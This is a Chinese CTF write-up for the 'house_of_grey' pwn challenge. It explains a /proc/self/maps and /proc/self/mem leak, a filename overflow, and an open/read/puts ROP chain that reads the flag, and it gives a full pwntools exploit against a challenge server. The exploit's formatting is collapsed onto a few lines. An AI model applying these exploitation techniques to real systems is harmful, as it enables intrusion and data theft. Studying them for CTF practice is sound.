[XCTF-pwn] 31_ciscn-2018-Quals_house_of

程序用子进程，可以打开任意文件读（除flag）指定位置，并可以写。文件名输入时有溢出。

看了exp也整了很久。

子进程的栈由mmap创建，在heap后边的就是。

思路：

打开/proc/self/maps，读取程序加载地址，读取子进程栈地址
打开/proc/self/mem，读取数据确定当前栈位置，计算read函数的返回地址
通过输入文件名时的溢出，将文件地址指针覆盖为read函数返回地址，并读入rop_orw

完整exp:

from pwn import *context.arch = 'amd64'
context.log_level = 'debug'def connect(local=1):global p,elf,libc_elf,one,libc_start_main_retif local == 1:p = process('./pwn')else:p = remote('111.200.241.244', 50185) libc_elf = ELF('/home/shi/buuctf/buuoj_2.23_amd64/libc6_2.23-0ubuntu10_amd64.so')one = [0x45216, 0x4526a, 0xf02a4, 0xf1147 ]libc_start_main_ret = 0x20830elf = ELF('./pwn')def enterRoom():p.sendlineafter(b"Do you want to help me build my room? Y/n?", b'Y')def openfile(name):p.sendlineafter(b'Exit\n', b'1')p.sendlineafter(b"So man, what are you finding?", name)def seekfile(idx):p.sendlineafter(b'Exit\n', b'2')p.sendlineafter(b"So, Where are you?\n", str(idx).encode())def readfile(size):p.sendlineafter(b'Exit\n', b'3')p.sendlineafter(b"How many things do you want to get?\n", str(size).encode())p.recvuntil(b"You get something:\n")def writefile(msg):p.sendlineafter(b'Exit\n', b'4')p.sendlineafter(b"content: \n", msg)'''b'You get something:\n'b'55e6eca25000-55e6eca27000 r-xp 00000000 08:05 334196                     /home/shi/xctf/031_ciscn-2018-Quals_house_of_grey/pwn\n'b'55e6ecc27000-55e6ecc28000 r--p 00002000 08:05 334196                     /home/shi/xctf/031_ciscn-2018-Quals_house_of_grey/pwn\n'b'55e6ecc28000-55e6ecc2b000 rw-p 00003000 08:05 334196                     /home/shi/xctf/031_ciscn-2018-Quals_house_of_grey/pwn\n'b'55e6ee56e000-55e6ee5a7000 rw-p 00000000 00:00 0                          [heap]\n'b'7fb35eb46000-7fb36eb46000 rw-p 00000000 00:00 0 \n'b'7fb36eb46000-7fb36ed06000 r-xp 00000000 08:05 403598                     /libc6_2.23-0ubuntu10_amd64.so\n'b'7fb36ed06000-7fb36ef06000 ---p 001c0000 08:05 403598                     /libc6_2.23-0ubuntu10_amd64.so\n'b'7fb36ef06000-7fb36ef0a000 r--p 001c0000 08:05 403598                     /libc6_2.23-0ubuntu10_amd64.so\n'b'7fb36ef0a000-7fb36ef0c000 rw-p 001c4000 08:05 403598                     /libc6_2.23-0ubuntu10_amd64.so\n'b'7fb36ef0c000-7fb36ef10000 rw-p 00000000 00:00 0 \n'b'7fb36ef10000-7fb36ef36000 r-xp 00000000 08:05 449698                     /ld_2.23-0ubuntu10_amd64.so\n'b'7fb36f132000-7fb36f135000 rw-p 00000000 00:00 0 \n'b'7fb36f135000-7fb36f136000 r--p 00025000 08:05 449698                     /ld_2.23-0ubuntu10_amd64.so\n'b'7fb36f136000-7fb36f137000 rw-p 00026000 08:05 449698                     /ld_2.23-0ubuntu10_amd64.so\n'b'7fb36f137000-7fb36f138000 rw-p 00000000 00:00 0 \n'b'7ffecaa43000-7ffecaa64000 rw-p 00000000 00:00 0                          [stack]\n'b'7ffecab10000-7ffecab14000 r--p 00000000 00:00 0                          [vvar]\n'b'7ffecab14000-7ffecab16000 r-xp 00000000 00:00 0                          [vdso]\n'b'ffffffffff600000-ffffffffff601000 --xp 00000000 00:00 0                  [vsyscall]\n'b'\n'
'''def pwn():context.log_level = 'critical'enterRoom()openfile(b'/proc/self/maps')readfile(0x10000)#pwndata = p.recvline()pwn_base = int(data.split(b'-')[0], 16)elf.address = pwn_basepop_rdi = next(elf.search(asm('pop rdi; ret')))pop_rsi = next(elf.search(asm('pop rsi; pop r15; ret')))#mmapwhile True:data = p.recvline()if b'heap' in data:data = p.recvline() #mmap next heapmmap_start = int(data.split(b'-')[0], 16)mmap_end   = int(data.split(b'-')[1].split(b' ')[0], 16)breakstack_start = mmap_startstack_end   = mmap_endoffset = 0xf800000begin_offset = stack_end - offset - 24*100000openfile(b'/proc/self/mem')seekfile(begin_offset)for i in range(24):readfile(100000)data = p.recvuntil(b'1.Find ', drop=True)if b'/proc/self/mem' in data:arr = data.split(b'/proc/self/mem')[0]breakif i == 23:raise('error')v8_addr = begin_offset + i*100000 + len(arr) #+ 5read_ret_addr = v8_addr -0x38print('read_ret_addr:', hex(read_ret_addr))payload = b'/proc/self/mem'.ljust(0x18, b'\x00') + p64(read_ret_addr)openfile(payload)  #set filename overlap v8'''0032| 0x7f8171bb0358 --> 0x55f51f73e0c7 (mov    DWORD PTR [rbp-0x68],eax)0088| 0x7f8171bb0390 ("/proc/self/mem")0112| 0x7f8171bb03a8 --> 0x7f8171bb0358 --> 0x55f51f73e0c7 '''name_addr = read_ret_addr+0x78print(hex(name_addr))context.log_level = 'debug'payload = flat(pop_rdi,name_addr, pop_rsi,0,0, elf.sym['open'], pop_rdi,6, pop_rsi,name_addr,0x50, elf.sym['read'],pop_rdi,name_addr, elf.sym['puts']) writefile(payload+ b'/home/ctf/flag\x00')p.recv()p.interactive()while True:try:connect(0)pwn()except KeyboardInterrupt as e:exit()except:p.close()

坑：

由于读取内存时有大小和次数限制，内存地址还不确定，所以成功次数不多，需要循环爆破。

[XCTF-pwn] 31_ciscn-2018-Quals_house_of_grey相关推荐

XCTF pwn例题思路整理侵删
XCTF pwn例题思路整理侵删 1 .decode("iso-8859-1") 处理报错 2 read() 栈溢出函数定义:ssize_t read(int fd, void ...
xctf pwn Aul
对于这道题我- binbin@ubuntu:~$ nc 111.198.29.45 33083 let's play a game | 0 0 0 0 0 0 0 0 | | 0 1 0 0 0 0 ...
linux kernal pwn WCTF 2018 klist（一）
启动脚本 #!/bin/shqemu-system-x86_64 -enable-kvm -cpu kvm64,+smep -kernel ./bzImage -append "consol ...
【pwn学习】GOT表劫持
文章目录例题 GOT表劫持获取Syscall open-read-write 利用系统调用号调用open 构造payload 获取syscall 读取flag文件 exp 例题例题:XCTF-00 ...
2018 百越杯 pwn（Boring Game Write up）
拿到题目,发现有libc库,想到应该就是要用到ret2libc了先把pwn扔到IDA看看先发现有明显的溢出漏洞. 发现程序是32位,且只开启了NX保护利用思路: 1.泄漏__libc_start ...
2018 百越杯 pwn(format WriteUp)
看到题目的内容,就知道大概是格式化漏洞了, 马上扔到IDA看个究竟. 不出所料,就是printf的格式化输出漏洞思路: 1.利用格式化漏洞覆盖任意地址的值,这里我们需要覆盖secret的值,所以先要 ...
ISCC 2018 PWN WriteUp
1.Login [分值:200]--年轻人的第一道PWN 漏洞位置: 漏洞见上图,BUF大小0x40 读取时读了0x280字节,这样可覆盖掉Menu函数的返回值. 此函数中存在一个可能执行system ...
2018东南大学 SUS 十一欢乐赛 pwn解题记录
pwn2plus 直接栈溢出覆盖调用callsystem函数. exp from pwn import * #p = remote("47.100.40.190" , 10007) ...
xctf攻防世界pwn基础题解（新手食用）
文章目录 CGFsb 关于评论区的问题 when_did_you_born 脚本备注: cgpwn2 目的: 溢出点: 构造shell: exp: strings Level3 status: up ...
ISC 2018 蓝鲸魔塔线上赛-pwn
前言这个应该是菜鸟pwn狗的成长之路吧..这个题目比较简单就记录一下正文首先checksec一波可以发现开了NX:栈不可执行,PIE:随机地址,RELRO:got表不可改写现在还不知道应该是 ...

[XCTF-pwn] 31_ciscn-2018-Quals_house_of_grey

[XCTF-pwn] 31_ciscn-2018-Quals_house_of_grey相关推荐

最新文章

热门文章